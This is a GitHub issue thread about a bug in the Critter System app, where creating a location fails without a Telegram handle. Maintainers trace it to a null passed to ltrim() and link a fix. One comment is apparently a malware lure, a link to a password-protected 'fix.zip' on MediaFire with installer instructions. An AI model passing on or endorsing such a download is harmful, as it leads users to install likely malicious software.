### ISSUE TITLE
Create Location shows an error if no Telegram handle was set

### ISSUE THREAD

**Issue by Corborax** [eurofurence/crittersystem#9]
### User Role

Critter System Staff

### System Type

Other

### Operating System

Other

### OS Version

-

### Browser Details (if applicable)

-

### Steps to Reproduce

Create a new location 
leave telegram empty

### Expected Behavior

A new location will be created.

### Actual Behavior

A Telegram account is expected for a location

### Feature Area

Other

### If you selected "Other", please specify

Location Management 

### Severity

Critical Problem

### Network Type

None

### Anything Else?

Remove the telegram field from location. There is no need for a Telegram contact for a room / location.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Corborax** [comment]
![grafik](https://github.com/user-attachments/assets/23665149-be88-4d37-a143-c9d994a78396)

Results in

![grafik](https://github.com/user-attachments/assets/ceee28de-cb66-4ab2-85b5-0a25c2b22efd)

**Comment by Corborax** [comment]
class Location extends BaseModel

https://github.com/eurofurence/crittersystem/blob/0e0329f20aff64a6e83f49ecab6313e3b34e20f1/src/Models/Location.php#L49
https://github.com/eurofurence/crittersystem/blob/0e0329f20aff64a6e83f49ecab6313e3b34e20f1/src/Models/Location.php#L55

**Comment by Fenrikur** [comment]
Might have been due to passing `null` to `ltrim()` in `LocationsController.php`. If that was indeed the issue, it should be fixed by https://github.com/eurofurence/crittersystem/commit/cd471d0d62cd8c56d2b571c4cec35561d8a26151.

**Comment by Corborax** [comment]
Should be resolved with the previous commit.
